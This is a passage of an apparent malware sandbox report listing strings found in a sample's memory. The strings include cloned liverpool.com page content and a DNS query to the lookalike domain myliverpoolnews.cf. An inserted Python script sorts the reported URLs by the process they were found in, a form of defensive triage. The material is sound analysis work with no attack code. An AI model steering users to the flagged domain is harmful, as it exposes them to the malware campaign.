target="_blank" data-provider="twitter" data-tracking="twitter|follow|bottom"></a></li></ul></h4></div><div class="kitemarks"><div class="ipso"></div></div><ul id="utility-links"><li><div itemprop="publisher" itemscope="itemscope" itemtype="https://schema.org/NewsMediaOrganization"><meta itemprop="publishingPrinciples" content="https://www.liverpool.com/about-us/"><meta itemprop="name" content="Liverpool.com"><meta itemprop="url" content="https://www.liverpool.com/"><div itemprop="logo" itemscope="itemscope" itemtype="https://schema.org/ImageObject"><meta itemprop="url" content="https://s2-prod.liverpool.com/@trinitymirrordigital/chameleon-branding/publications/liverpool/img/logo-liverpool.png"></div></div><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/rules/">Competition Rules</a></li><li><a href="https://www.liverpool.com/how-to-complain/">How to Complain</a></li><li><a href="https://www.liverpool.com/corrections-clarifications/">Corrections &amp; Clarifications</a></li><li><a href="https://www.liverpool.com/privacy-notice/">Privacy Notice</a></li><li><a href="https://www.liverpool.com"> equals www.facebook.com (Facebook) and www.twitter.com (Twitter)
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: <header class="mod-header" data-mod="header" data-immediate><div class="primary publication-theme-highlight"><a data-link-tracking="Header|MainLogo|Image|liverpool" id="logo" href="/">liverpool</a><a class="icon" id="hamburger" href="#">Load mobile navigation<span></span></a><nav class="primary"><section><ul data-level="1"><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Liverpool FC News" href="https://www.liverpool.com/liverpool-fc-news/">Liverpool FC News</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Latest News" href="https://www.liverpool.com/liverpool-fc-news/">Latest News</a></li><li><a data-link-tracking="Header|DropDown|Text|Transfer News" href="https://www.liverpool.com/liverpool-fc-news/transfer-news/">Transfer News</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li class="has-children"><a data-link-tracking="Header|SectionLabel|Text|Schedule" href="https://www.liverpool.com/schedule/">Schedule</a><ul data-level="2"><li><a data-link-tracking="Header|DropDown|Text|Premier League" href="https://www.liverpool.com/all-about/premier-league">Premier League</a></li></ul><a class="icon toggle" href="#">Expand</a></li><li><a data-link-tracking="Header|SectionLabel|Text|Features" href="https://www.liverpool.com/liverpool-fc-news/features/">Features</a></li></ul></section></nav><profile-icon lr-custom-id="signin" lr-custom-class="header-profile-icon" lr-gtm-label="header" lr-show-account-link></profile-icon><div class="search"><button class="icon icon-search" id="search-icon" type="button" aria-label="Search"></button></div><div class="search-box hidden"><gcse:searchbox-only resultsUrl="https://www.liverpool.com/search/"></gcse:searchbox-only></div><div class="social-sites"><ul><li class="follow hidden"><span class="follow-text publication-theme">Follow us</span></li><li><a class="icon facebook" title="facebook" href="https://www.facebook.com/liverpooldotcom" target="_blank" data-provider="facebook" data-tracking="facebook|follow|top"></a></li><li><a class="icon twitter" title="twitter" href="https://twitter.com/liverpoolcom_" target="_blank" data-provider="twitter" data-tracking="twitter|follow|top"></a></li></ul></div></div><nav class="secondary" data-smooth-scroll><section><ul class="click-track" data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/advertising/">Advertise with us</a></li></ul></section></nav><nav class="footer"><section><ul data-level="1"><li><a href="https://www.liverpool.com/about-us/">About Us</a></li><li><a href="https://www.liverpool.com/contact-us/">Contact Us</a></li><li><a href="https://www.liverpool.com/rss-feeds/">RSS Feeds</a></li><li><a href="https://www.liverpool.com/terms-conditions/">T&amp;Cs</a></li><li><a href="https://www.liverpool.com/cookie-policy/">Cookie Policy</a></li><li><a href="https://www.liverpool.com/r
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: <meta property="og:site_name" content="Liverpool.com"><meta property="og:language" content="en"><meta property="og:type" content="article"><meta property="og:title" content="The Brewster Experience has underdelivered so far, but that will change"><meta property="og:url" content="https://www.liverpool.com/liverpool-fc-news/features/rhian-brewster-liverpool-arsenal-team-17172763"><meta property="og:description" content="Rhian Brewster was hyped up before the start of the season, but was that fair?"><meta property="og:image" content="https://i2-prod.liverpoolecho.co.uk/incoming/article17172788.ece/ALTERNATES/s1200/1_GettyImages-1178657262.jpg"><meta property="og:section" content="Features"><meta property="article:tag" content="Rhian Brewster"><meta property="article:author" content="https://www.facebook.com/kristianwalsh1987/"><meta property="article:published_time" content="2019-10-30T16:00:00Z"><meta property="article:modified_time" content="2019-10-30T15:36:53Z"><meta property="article:expiration_time" content="2019-11-29T15:36:53Z"><meta property="article:section" content="Features"><meta property="article:id" content="liverpool-17172763"> equals www.facebook.com (Facebook)
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: n, Gomez/Lovren, James Milner, Oxlade-Chamberlain, Naby Keita and Divock Origi. An impressive outing against Arsenal could nudge him ahead of Adam Lallana, or even Harvey Elliott, in the fight for that seventh spot.</p> <p>The world is still expected to be at Brewster&apos;s feet at Liverpool. It is just a matter of waiting for him to be passed it.</p><!-- Article End--></div><div id="social-follow" data-mod="socialFollow"><div id="social-methods"><div class="facebook-share"><span class="icon facebook large"></span><div class="fb-like" data-href="https://www.facebook.com/liverpooldotcom" data-layout="button_count" data-action="like" data-size="large" data-width="300" data-show-faces="false" data-share="false"></div><span class="page-name">liverpooldotcom</span></div><div class="twitter-share" data-follow-url="https://twitter.com/intent/follow?screen_name=liverpoolcom_"><span class="icon twitter large"></span><a>Follow @<span>liverpoolcom_</span></a></div></div></div><div class="tag-list"><span class="publication-theme-border publication-theme-icon">More On</span><ul><li><a class="publication-theme-button-highlight" href="https://www.liverpool.com/all-about/rhian-brewster" data-link-tracking="EndArticle|Tag">Rhian Brewster</a></li></ul></div></div><aside class="related-column secondary"></aside></div></article> equals www.facebook.com (Facebook) and www.twitter.com (Twitter)
Source: unknown  DNS traffic detected: queries for: myliverpoolnews.cf
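The "String found in binary or memory" entries in this report mix three kinds of URL: those from the sample's own memory (myliverpoolnews.cf, whose paths mirror liverpool.com, and the cloned page's assets on i2-prod.liverpool.com), those from powershell.exe and svchost.exe memory that come from those binaries' own modules rather than from the sample, and certificate, CRL, OCSP and schema URLs that appear in nearly every Windows sandbox run. As an added example, not part of the Joe Sandbox report, the following Python parses entries of that form, attributes each URL to the processes whose memory dumps it was found in, drops hosts on an allowlist, and separates what was seen in the sample's memory from what was seen only in other processes. The sample lines are copied from this report; the allowlist and the sample's process name as the attribution key are assumptions.

```python
import re
from urllib.parse import urlsplit

# Entries copied from this report. The last line is a DNS entry, included to
# show that lines of another shape are skipped rather than misparsed.
REPORT_LINES = [
    "Source: lfQuSBwdSf.exe, 00000000.00000002.345756347.0000000003106000.00000004.00000001.sdmpString found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0",
    "Source: powershell.exe, 00000005.00000002.514285099.0000000002F19000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0",
    "Source: lfQuSBwdSf.exe, 00000000.00000002.344997356.00000000030C1000.00000004.00000001.sdmpString found in binary or memory: http://myliverpoolnews.cf",
    "Source: lfQuSBwdSf.exe, 00000000.00000002.344997356.00000000030C1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.522995118.0000000004881000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.520364713.0000000004DC1000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name",
    "Source: powershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmpString found in binary or memory: https://contoso.com/License",
    "Source: svchost.exe, 00000014.00000002.502117639.000001DDF383E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com",
    "Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg",
    "Source: unknownDNS traffic detected: queries for: myliverpoolnews.cf",
]

# One entry: "Source: <proc>, <dump>[, <proc>, <dump>...]String found in binary or memory: <url>".
# The \s* tolerates both the run-together form and a form with a separator.
ENTRY = re.compile(r"^Source: (?P<sources>.+?\.sdmp)\s*String found in binary or memory: (?P<url>\S+)")
SOURCE = re.compile(r"([^,\s]+), ([0-9A-Fa-f.]+\.sdmp)")

# Assumption: hosts that carry no signal on their own in a Windows/.NET sandbox run
# (PKI infrastructure, schema namespaces, PowerShell module metadata, Windows telemetry).
BENIGN_SUFFIXES = (
    "digicert.com", "globalsign.net", "schema.org", "schemas.xmlsoap.org", "w3.org",
    "nuget.org", "pesterbdd.com", "apache.org", "windows.com", "xboxlive.com", "microsoft.com",
)


def parse_entry(line):
    """Return {'sources': [(process, dump), ...], 'url': str}, or None for other entry kinds."""
    m = ENTRY.match(line)
    if not m:
        return None
    return {"sources": SOURCE.findall(m.group("sources")), "url": m.group("url")}


def host_of(url):
    # urlsplit keeps the trailing ASN.1 residue the sandbox leaves after CRL/cert
    # URLs ("...crt0") in the path, so the hostname comes out clean.
    return (urlsplit(url).hostname or "").lower()


def is_benign(host):
    return any(host == s or host.endswith("." + s) for s in BENIGN_SUFFIXES)


def triage(lines, sample="lfQuSBwdSf.exe"):
    """Split non-allowlisted hosts into those seen in the sample's own memory and
    those seen only in other processes. Each value is the set of processes involved."""
    in_sample, elsewhere = {}, {}
    for line in lines:
        entry = parse_entry(line)
        if entry is None:
            continue
        host = host_of(entry["url"])
        if not host or is_benign(host):
            continue
        procs = {proc for proc, _ in entry["sources"]}
        bucket = in_sample if sample in procs else elsewhere
        bucket.setdefault(host, set()).update(procs)
    return in_sample, elsewhere


if __name__ == "__main__":
    found, noise = triage(REPORT_LINES)
    for host, procs in sorted(found.items()):
        print("sample memory :", host, sorted(procs))
    for host, procs in sorted(noise.items()):
        print("other process :", host, sorted(procs))
```

Attribution does most of the work: contoso.com survives the allowlist but lands in the "other process" bucket because it was only ever found in powershell.exe memory, which is where PowerShellGet's module templates put it. What remains in the sample bucket is the short list worth pivoting on: the .cf domain the sample resolved and the assets of the page it cloned.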
Source: lfQuSBwdSf.exe, 00000000.00000002.345756347.0000000003106000.00000004.00000001.sdmp  String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: powershell.exe, 00000005.00000002.514285099.0000000002F19000.00000004.00000020.sdmp  String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: lfQuSBwdSf.exe, 00000000.00000002.340683009.0000000001392000.00000004.00000020.sdmp  String found in binary or memory: http://crl3.d
Source: lfQuSBwdSf.exe, 00000000.00000002.345756347.0000000003106000.00000004.00000001.sdmp  String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: lfQuSBwdSf.exe, 00000000.00000002.340683009.0000000001392000.00000004.00000020.sdmp  String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: lfQuSBwdSf.exe, 00000000.00000002.345756347.0000000003106000.00000004.00000001.sdmp  String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0
Source: lfQuSBwdSf.exe, 00000000.00000002.344997356.00000000030C1000.00000004.00000001.sdmp  String found in binary or memory: http://myliverpoolnews.cf
Source: lfQuSBwdSf.exe, 00000000.00000002.344997356.00000000030C1000.00000004.00000001.sdmp  String found in binary or memory: http://myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-
Source: powershell.exe, 00000005.00000002.536067747.00000000058E2000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.535279406.0000000005E25000.00000004.00000001.sdmp, powershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmp  String found in binary or memory: http://nuget.org/NuGet.exe
Source: lfQuSBwdSf.exe, 00000000.00000002.345756347.0000000003106000.00000004.00000001.sdmp  String found in binary or memory: http://ocsp.digicert.com0
Source: lfQuSBwdSf.exe, 00000000.00000002.340683009.0000000001392000.00000004.00000020.sdmp  String found in binary or memory: http://ocsp.digicert.com0:
Source: powershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmp  String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: http://schema.org/BreadcrumbList
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: http://schema.org/ListItem
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: http://schema.org/NewsArticle
Source: powershell.exe, 00000005.00000002.526440831.00000000049BB000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmp  String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: lfQuSBwdSf.exe, 00000000.00000002.344997356.00000000030C1000.00000004.00000001.sdmp, powershell.exe, 00000005.00000002.522995118.0000000004881000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.520364713.0000000004DC1000.00000004.00000001.sdmp  String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000005.00000002.526440831.00000000049BB000.00000004.00000001.sdmp, powershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmp  String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmp  String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: lfQuSBwdSf.exe, 00000000.00000002.345756347.0000000003106000.00000004.00000001.sdmp  String found in binary or memory: http://www.digicert.com/CPS0v
Source: svchost.exe, 00000014.00000002.502117639.000001DDF383E000.00000004.00000001.sdmp  String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 00000014.00000002.502117639.000001DDF383E000.00000004.00000001.sdmp  String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000014.00000002.502117639.000001DDF383E000.00000004.00000001.sdmp  String found in binary or memory: https://activity.windows.com
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: https://ads.pubmatic.com/AdServer/js/pwt/156997/3236/pwt.js
Source: svchost.exe, 00000014.00000002.502117639.000001DDF383E000.00000004.00000001.sdmp  String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: https://c.amazon-adsystem.com/aax2/apstag.js
Source: svchost.exe, 00000014.00000002.502117639.000001DDF383E000.00000004.00000001.sdmp  String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: powershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmp  String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmp  String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000009.00000002.535629582.0000000005713000.00000004.00000001.sdmp  String found in binary or memory: https://contoso.com/License
Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://felix.data.tm-awx.com
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: https://felix.data.tm-awx.com/ampconfig.json&quot;
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: https://felix.data.tm-awx.com/felix.min.js
Source: powershell.exe, 00000007.00000002.524562534.0000000004EFD000.00000004.00000001.sdmp  String found in binary or memory: https://github.com/Pester/Pester
Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://github.com/ded/script.js
Source: lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article17156435.ece/ALTERNATES/s615/1_GettyImages-1183794835.
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article17166876.ece/ALTERNATES/s615/0_GettyImages-1175998874.
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-02-
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s220b/0_WhatsApp-Image-2021-02
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s270b/0_WhatsApp-Image-2021-02
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19936064.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-02-
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s180/0_Salah-Pressing.jpg
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s220b/0_Salah-Pressing.jpg
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s270b/0_Salah-Pressing.jpg
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19938370.ece/ALTERNATES/s615/0_Salah-Pressing.jpg
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s180/0_Curtis-10.png
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s220b/0_Curtis-10.png
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s270b/0_Curtis-10.png
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19940968.ece/ALTERNATES/s615/0_Curtis-10.png
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s180/0_Salah-Goal-vs-Leeds.jpg
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s220b/0_Salah-Goal-vs-Leeds.jp
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s270b/0_Salah-Goal-vs-Leeds.jp
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19945821.ece/ALTERNATES/s615/0_Salah-Goal-vs-Leeds.jpg
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s180/0_RobertsonCross1.jpg
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s220b/0_RobertsonCross1.jpg
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s270b/0_RobertsonCross1.jpg
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19946983.ece/ALTERNATES/s615/0_RobertsonCross1.jpg
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s180/0_GettyImages-1231353837.
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s220b/0_GettyImages-1231353837
Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmp  String found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s270b/0_GettyImages-1231353837
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955390.ece/ALTERNATES/s615/0_GettyImages-1231353837.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s180/0_GettyImages-1304940818.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s458/0_GettyImages-1304940818.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19955855.ece/ALTERNATES/s615/0_GettyImages-1304940818.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s180/1_FreeAgentPlayers.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s458/1_FreeAgentPlayers.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19957561.ece/ALTERNATES/s615/1_FreeAgentPlayers.jpg
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960206.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s180/0_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s458/0_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19960478.ece/ALTERNATES/s615/0_WhatsApp-Image-2021-03-
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s180/0_GettyImages-1273716690.
                      Source: lfQuSBwdSf.exe, 00000000.00000003.228963232.00000000040EA000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.225090354.0000000006081000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000002.346059518.000000000311E000.00000004.00000001.sdmp, lfQuSBwdSf.exe, 00000000.00000003.233038130.0000000003334000.00000004.00000001.sdmpString found in binary or memory: https://i2-prod.liverpool.com/incoming/article19961704.ece/ALTERNATES/s220b/0_GettyImages-1273716690
